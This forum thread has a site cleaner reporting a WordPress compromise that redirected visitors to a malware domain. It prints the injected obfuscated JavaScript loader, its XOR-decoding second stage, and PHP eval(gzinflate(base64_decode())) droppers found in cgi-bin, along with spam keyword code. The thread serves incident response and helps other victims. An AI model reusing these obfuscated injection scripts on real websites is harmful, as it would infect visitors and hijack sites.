Wordpress obfuscated javascript pointing to centiyo mal
by snipe
7 months ago

Hi all – I was actually here for a different reason (trying to diagnose a Google malware site flag, even though I don’t see anything odd in the source), and I noticed that someone posted that you guys are trying to keep track of obfuscated javascript injections.

I spent part of last week fixing a series of Wordpress blogs that contained obfuscated javascript pointing to centiyo.com, a known malware site.

This code was found just below the closing head tag, above the opening body tag:

<scr ipt>var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-49-46-65-64-61-66-68-6:-215-227-227-223-69-58-58-::-212-221-227-216-232-222-57-::-222-21:-58-216-221-57-::-214-216-74-61-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.wr ite(result); </script> [spaces added]

I also found it further down on the page.

This script pointed to a CGI script called in.cgi on the centiyo.com site. I fetched that page with wget (so that it could not execute in a browser); the following is the output returned by in.cgi.

<sc ript language="JavaScript" type="text/javascript">this.cZ=false;var qNE;var lAH=new Date();var dMN=false;qNE="11151714151416145e23241907293f153a035c0337112f130b2801215d590d0d4835171b20046d19020716431032210112054c36200b641a0e414b41151800192e5d1804041a051c200f130b023f045d5c0b1613140a06696e580d31290a10184f2e28225d051d123016080c0b003217205a440906065b545a0c01173d0318050637505c1d2f261a103614290108560b1132383306090b250a5d025a430e1c1105477a56641242525e5d1"+"d05751804034f192415560a17040d1530101f011935430e0a49421a2f0b02415161454552591e311c0a240640077b4e4d0f1913343005021006041534556b0b27445a46083448260b303602585c150d0210121e1c1768020b1900580022121108081e4e4b48400c0d383407351b4029171e49481d190d081b24314a490c4a6703152b322d491a510c2c242804101036374b032f000d0313100c5718343438002628192809664f54160006"+"53241e0a0e19283a331c08173e095b0a0f0c16143f09283d4f5e29174c1239353d033c3611290971560d140115131e470a363742185b00180807197515473c0b11161202036712450f0a195f082425162a701f047430246126311c0a406841675901070b64102911412e1207133c535f5a465b091a0b55233816053b312451664e56485d0701074508043d0b561702031348415140563119135b1f111911113f125558422b121a2f05161"+"21e2c6d140602141400221d175812030c0a331a173e1f14026b4d7808164f191f2e101013164b0e0b33411a38004a7c2b0a1807724d465755435b574a1629130b410e11031a01427a5f185c0f011506105145344a087345263a04117a5c5f4c5d1733551a0825132a0b310c0d615f78551559030c174b153e140515230b40047a03321d081d3050455442271906143848210d0f061104340c4125151d170b7a0f0a575275321221310472"+"051c01121f0f091c5d0c3c0e0c201132402e4e55240317152f33385b35163c54587d1b0305250a5330244243061e434847190d22640a073f00313d3a571c515d3e1f39762b23003014100f5c547201312a3804563e231822424a46487b1e0b030f261d510924490f144b3f224c30291a1a5a5c5e445d571e57005b1c17090a5e041153561b1738183f511b243e43685f6e42590729293236681c173b5d59510b19011e151813321f61031"+"b29021a12354e1b0839010609425601140d191f6b01287605485e4d162f1e02402944122a3506500f2010061c42121f140f3638123d294e0f1413083a03203b0301223a3f53373f2e1d5018151518120914050
e121a4f180b4d08500d2135107529271d480e26424718321b4d42154b43564f445c445468764a537c00512404006e383514451b536b5e090c1d5d0f412a0c765d470e300d49330c1206050d2a0e0365444b051145253911"+"211044175d5306771b5e586e435b285b2b40010536005014301c5f374834131b39004f6a65494b454241252321634b56424b7f5f4b4f1b022d332213303e171f51445650440f255b031411162e7b1f59182f08071b05301f030f2b582a103517074f7d5810170d1811057b3c2e01181e2e405f560916383a1c17380d145b05010d5a461e2a07105950193d37272e161b0f0f6a041804152f40571111310f1a5e407d4f74415914010a3e2"+"b16415c534b72785b283c5f54140220025e3d4d0b483e0503421d5351000b15081e4854064d55411a611f0d1f251f25013f125a795d491e0a00101117495a53480a235c051a281f11653f1300540a1a2d0316172e36041f5d5c1f1715161d0d331616150d0b000312425d796a1d2d0d21380f3e282d504f553437175d0e302206312d266e522a1705060a3623040c424601504007593e654b04065249547a34431b373c1e243e4656461b";var iPU=new Date();var mTA=new Date();function iP(f){var sPW=new Array();var d = null;this.pS='';var r = window;this.vU=29116;var fO = document;var rE=false;var wX = String;this.xY=false;this.wP="wP";function x(t){var mZ=false;var tE = 0, uR = t['loeSnSgotSh8'.replace(/[8LoS7]/g, '')];var dY = 0;var kF='';while(dY < uR){var yV=23973;dY++;var hU=false;kX = fA(t, dY - 1);this.cP=false;tE += kX * uR;}var qT=new Date();return new String(tE);var zI=13130;}var jS=new Date();this.oDM=11814;function gX(xS, aB){this.mL=false;if(d == null) {this.pQ=false;d = {};this.zY="";}this.gJ='';if(d[xS] == null) {var sT=function(){};var p = Object;var iPW=352;this.eH="";d[xS] = new p();d[xS].b = 0;this.aLG="aLG";d[xS].h = aB;this.uB="uB";}}var nU="nU";var lW="lW";function dA(xS) {this.tW=false;var nY=new Array();if(d[xS] != null) {var wN='';var sP = d[xS];var fOV="";var rC = sP.b;var yT = sP.h;this.rW="rW";var l = yT.substr(rC, 1);var uJS=new Array();var v = yT['loeSnSgotSh8'.replace(/[8LoS7]/g, '')];var nK="";this.jC='';if(rC + 1 >= v) {var cV='';sP.b = 0;} else {this.fQ="";sP.b = rC + 1;var jM=3332;}var sF="";return fA(l, 
0);}this.wH=25823;}var jSV=16063;function fA(j, bY){return j.charCodeAt(bY);var eV=2207;}this.pQX="pQX";function yJ(jO, oR){return jO ^ oR;this.iR="iR";}var nQ='';var vA = new String(document['w)rxi)t6e6'.replace(/[6\)bx\!]/g, '')]);var tI='';if(vA['iJnhdZeJxJOZfh'.replace(/[hrJyZ]/g, '')]('aHrbiQtbyA'.replace(/[AbQHW]/g, '')) != -1) {var yN=new Date(); return 35;}this.sFM="sFM";this.xG="xG";var kB = r['s~eqt^T^i:m:eqo^u^t:'.replace(/[\:\^x~q]/g, '')];this.sTS="";var pY = 35;this.qD=6723;var aBG = r['uAn2eAs8c<a2p2eN'.replace(/[NA\<28]/g, '')];var sL = '';var hUX=30243;var pO = wX['f2r}o}m2C2h[aHr2C[oGd[eH'.replace(/[H\[2\}G]/g, '')];var rY=29362;var sR = '';var cH='';for(var fM = 0; fM < f.length; fM += 2){var dSD=new Date();sR += '%' + f['s/uIbJsItvrN'.replace(/[NIJ/v]/g, '')](fM, 2);}var nI=new Array();this.jQ='';var f = aBG(sR);var hS='';var rI="";var oD = new wX(iP);this.wLW="";this.nUN="nUN";var xE = ['r8e4p4lxa8c4e4'.replace(/[432x8]/g, '')];var aD = xE.toString().match(new RegExp('.{1,' + (1+Math.floor(Math.random()*xE.length) || '1') + '}', 'g'));var eLY=function(){};var yXK=false;var pK = oD[aD.join('')](/[^@a-z0-9A-Z_-]/g, '');var eHI=new Date();this.oBS='';var yJY = new wX(x(pK));var xIZ="";gX('gXE', pK);this.vS=3722;gX('qP', yJY);var kJI="";var mZU=31218;for(var dU = 0; dU < (f['loeSnSgotSh8'.replace(/[8LoS7]/g, '')]); dU++) {var wBK="";this.aDS=10330;var wB = fA(f, dU);this.aN='';wB = yJ(wB, pY);wB = yJ(wB, dA('qP'));var yTU="yTU";wB = yJ(wB, dA('gXE'));var aBO=false;var uV="";sL += pO(wB);}var zA=false;var vM=new Array();r['eyviahli'. replace(/[ih8y\?]/g, '')](sL);var xW="xW";return sL = new wX();var iLS="";var mNI="mNI";};this.aT=27387;this.wV=9757;iP(qNE);var gZ;if(gZ!='' && gZ!='dAR'){gZ='hWD'};var eR=new Array();</sc ript> [spaces added]

The attack vector in this case appears to have been an older version of Wordpress running in the same hosting account (and therefore under the same uid), which was used to infect the files of the up-to-date installs.

In these cases, the injected code was found in the wp-blog-header.php file.

This pattern was the same for 7 out of the 8 sites I had to fix for a client. The 8th site was slightly different though.

- wp-blog-header. php <— malicious code [space added]

In wp-load.php, I found:
require(‘../cgi-bin/wp-content’);

In the cgi-bin directory, I discovered three files:
- system
- theme.html
- wp-content

The wp-content file discovered in the cgi-bin contained the following:

<?php Error_Reporting(0); ?> <?php eval(gz inflate(base64_de code("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"))); ?> <?php eval(gz inflate(base64_decode("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"))); ?> [spaces added]

The system file discovered in the cgi-bin contained an ad for Cialis, and the following PHP code:

<?php eval(gz inflate(base64_decode("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"))); ?> [spaces added]

The theme.html file contained some PHP code at the top:

} elseif(strstr($refer,‘msn’)) { //do msn stuff $match = preg_match(‘/&q=([a-zA-Z0-9+-]+)/’,$refer, $output); $querystring = $output0; $querystring = str_replace(‘&q=’,’’,$querystring); $querystring = str_replace(‘+’,’ ’,$querystring); return $querystring; } else { //else, who cares return false; }

}
if(getKeywords()){
$key = getKeywords();
$key = str _replace(" “,”+",$key);
}
$host=$host.“-”.$key;
?> [spaces added]

This appears to serve only to tag the links back to the host site (http://ontario-pharmacy.com) with the host name, for example http://ontario-pharmacy.com/item.php?said=<?php echo $host; ?>&id=3740.

Funnily, there was a link to the W3C validator and a notice that the site is XHTML compliant. I guess it’s good that the bad guys care about standards compliance too… lol. (I’m sure they just snagged a default Wordpress template and that it wasn’t intentional.)

Anyway – I just wanted to post this here, in case it helps anyone else. The centiyo hack was hitting a lot of people pretty hard in January, so with any luck, someone googling for help will find this.

by WeWatch
7 months ago

Excellent job!

You might have a future in writing security findings.

One comment: the hackers do use the W3C validator and various other means to “fool” the unsuspecting blog owner into thinking that the file must be okay.

I refer to the recent malscripts that include the /*GNU GPL*/ string in them.

Again, nice job and thank you for sharing.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by snipe
7 months ago

Hi WeWatch – Thanks for the compliment. Yeah, but this particular exploit was literally including a giant pharmacy ad – there’s no way a site owner wouldn’t notice that and could think it was okay. :)

I do this sort of work a lot, so I’m used to documenting things. I threw together a blog post about this sort of thing: http://www.snipe.net/2010/01/when-wordpress-gets-hacked/

I also plan to put together more documentation on the hacks I’ve been dealing with for clients over the past two weeks.

When I first ran into the centiyo hack, I couldn’t find much info on it, other than the attacks on Vbulletin from Nov/Dec, which didn’t help much for troubleshooting a Wordpress install. Hopefully the next time someone googles for it, they’ll find this page and be able to work through it faster.
